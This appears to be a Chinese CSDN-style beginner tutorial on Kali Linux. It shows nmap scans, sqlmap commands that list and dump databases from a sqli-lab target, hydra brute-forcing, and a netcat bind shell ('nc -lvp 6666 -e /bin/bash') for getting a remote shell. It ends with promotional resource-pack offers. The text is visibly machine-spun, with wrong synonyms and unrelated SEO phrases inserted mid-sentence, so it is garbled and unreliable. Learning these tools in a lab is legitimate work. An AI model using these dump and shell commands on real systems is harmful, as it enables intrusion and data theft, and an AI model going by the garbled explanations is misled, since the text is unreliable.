Kali Linux：黑客最喜爱的渗透测试专用 Linux 操作系统

序言

相信好多同事了解到和学习网路安全的时侯都听过kali系统，你们都称之为黑客最喜爱的系统，这么哪些是kali，初学者用kali能做些哪些，我将在本文中做简单的介绍

一、kalilinux是哪些？

KaliLinux是专门用于渗透测试的Linux操作系统，它由BackTrack发展而至。在整合了IWHAX、WHOPPIX和Auditor这三种渗透测试专用LiveLinux后,BackTrack即将更名为KaliLInux。没错，kali的本质也是linux系统，就好比先前的黑客常常使用一些工具，久而久之的你们就共同开源了一个集成了各类黑客工具系统。至于为何黑客都喜欢使用kali，主要是在kali中工具齐全防止了在须要使用的时侯发觉工具须要再下载安装的麻烦

二、安装下载kali

kali的官网地址：

目前kali一直在保持着更新，目前最新的kali系统为kalipurple，上面承继了更多的逼抢方使用的工具。

下载解压后用vm打开即可，默认root帐号密码均为kali，kali。没有用过VMware的朋友可以先到网上学习怎么下载vm。另外菜鸟可能会碰到虚拟机没有网路的问题，菜鸟我这儿推荐配置网卡时选择直接联接，等以后了解到网卡网关的知识可以再自己配置想要的网卡信息。（左上角虚拟机，设置linux基础入门学习教程，网路适配器，桥接模式，复制化学网路联接状态）

三、kali常见工具介绍

正如刚刚所说，kali里集成了大量的黑客工具和网路安全相关工具，可以说黑客须要做的所有事情在这个系统中都有工具可以实现。下边我推荐几个菜鸟入门可以用到的小工具。

1.nmap

nmap被称为诸神之眼，是一款十分强悍的网路侦测工具，可以实现主机发觉和端口扫描，同时自身也可带漏洞扫描的脚本可以完成对主机端口的漏洞扫描

nmap最基础用法：

nmap [目的ip]nmap 192.168.1.10nmap [目的网段]nmap 192.168.1.0/24

map也提供了大量的扫描时侯可以设置的参数，下边将举例常用的参数：

添加参数可以显示出不同的扫描结果

2.sqlmap

sqlmap是针对sql注入漏洞的一款手动化sql注入侦测工具，支持多种操作系统环境和多种数据库的漏洞侦测，渗透测试人员经常嘲讽“没有哪些操作技术，就是sqlmap一把牌九，屏幕显示绿了就直接上班”

sqlmap的基本使用:

sqlmap -u "www.baidu.com"

你们尽量不要在未授权的情况下去对网段资产进行批量扫描，当心去踩缝纫机哦

下边我以sqli-lab上面的靶场为例：

出现图中绿色信息说明sqlmap对该参数成功注入，注意我的url中在最后以GET方法输入了参数id（/?id），倘若不给sqlmap提供参数sqlmap是难以使用的哦

找到注入点后的步骤基本是确定的

 sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  --dbs  #获取当前数据库服务所开启的数据库名称 sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 --tables  #获取某数据库下的所有表名 sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 -T 表名 --columns #获取D数据库下T表内的所有字段sqlmap -u "http://192.168.0.107/sqli/Less-1/?id=1"  -D 数据库名 -T 表名 -C 字段名 --dump  #将该字段的内容全部获取出来并存储，在最后的信息中会有存储路径信息

第一步获取数据库：

第二步获取数据库下表名：

第三步获取该表数组（虽然到表名这一步可以直接–dump获取表里所有内容）

所以sqlmap的使用苦处在于怎样找到注入点，也就是找到形成sql注入的参数，在反例里参数是GET方法上传的“id”参数，下边提供一些sqlmap常用的参数

3.hydra

hydra又称九头蛇，是一款十分高效的多种合同都可以使用的爆破工具，对指定ip的指定服务进行爆破linux学习视频，须要输入爆破使用的字典或则自己指定爆破使用的数据（例如在已知帐号为admin时爆破密码）

在kali中hydra有图形化和命令行两种使用方法

对于菜鸟来说，图形化界面愈发简易好用，下边介绍图形化使用

然后选择start就好了，hydra会使用字典中的所有帐号密码去做登录的爆破尝试

cat

netcat简称nc，是一款目前最常用网路工具，它提供基于socket合同套接字针对TCP，UDP联接的网路使用，在具有nc使用权时几乎可以构建任何类型的联接，一般在渗透测试中用该工具获得目的ip的shell

nc简单使用方法：构建联接传输信息

主机1：开启对6666端口的窃听

nc -lvp 6666

参数解释：

主机2：联接主机1的6666端口

nc 192.168.0.163 6666

nc常用使用：获取远程主机shell

1.正向联接shell

主机1：

nc -lvp 6666 -e /bin/bash

参数解释：

这儿将主机1的/bin/bash重定向到了自己主机的6666端口

主机2：

nc 192.168.0.163 6666

你们可以思索一下为何右侧会有下边的报错呢？而且在执行sudosu尝试步入root权限时，必须在左边主机输入密码才可以步入，步入后就会收到来自两侧发来的密码kali而且形成报错。可以尝试了解不同终端bash/zsh/sh的区别

最后

同学们假如有须要全套网路安全入门+进阶学习资源包，可以点击免费发放（如遇扫码问题，可以在评论区留言发放哦）~

CSDN大礼包：《黑客&网路安全入门&进阶学习资源包》免费分享

1.网安必备全套工具包和源码

2.视频教程

网上其实也有好多的学习资源，但基本上都残缺不全的，这是我自己录的网安视频教程，路线图上的每一个知识点，我都有配套的视频讲解。

3.技术文档和电子书

技术文档也是我自己整理的，包括我出席护网行动、CTF和挖SRC漏洞的经验和技术要点。

网安方面的电子书我也收藏了200多本，基本上热门的和精典的我都有，也可以共享。

4.NISP、CISP等各类证书复习大礼包

5.CTF项目实战

学习网安技术最忌讳纸上谈兵linux基础入门学习教程，而在项目实战中，既能学习又能获得酬劳的CTF大赛无疑是最好的绊脚石！

6.网安大厂笔试题

这几年整理的网安方面的笔试题redhat linux 下载，假如你是要找网安方面的工作，它们绝对能帮你大忙。

同学们假如有须要全套网路安全入门+进阶学习资源包，可以点击免费发放（如遇扫码问题，可以在评论区留言发放哦）~

CSDN大礼包：《黑客&网路安全入门&进阶学习资源包》免费分享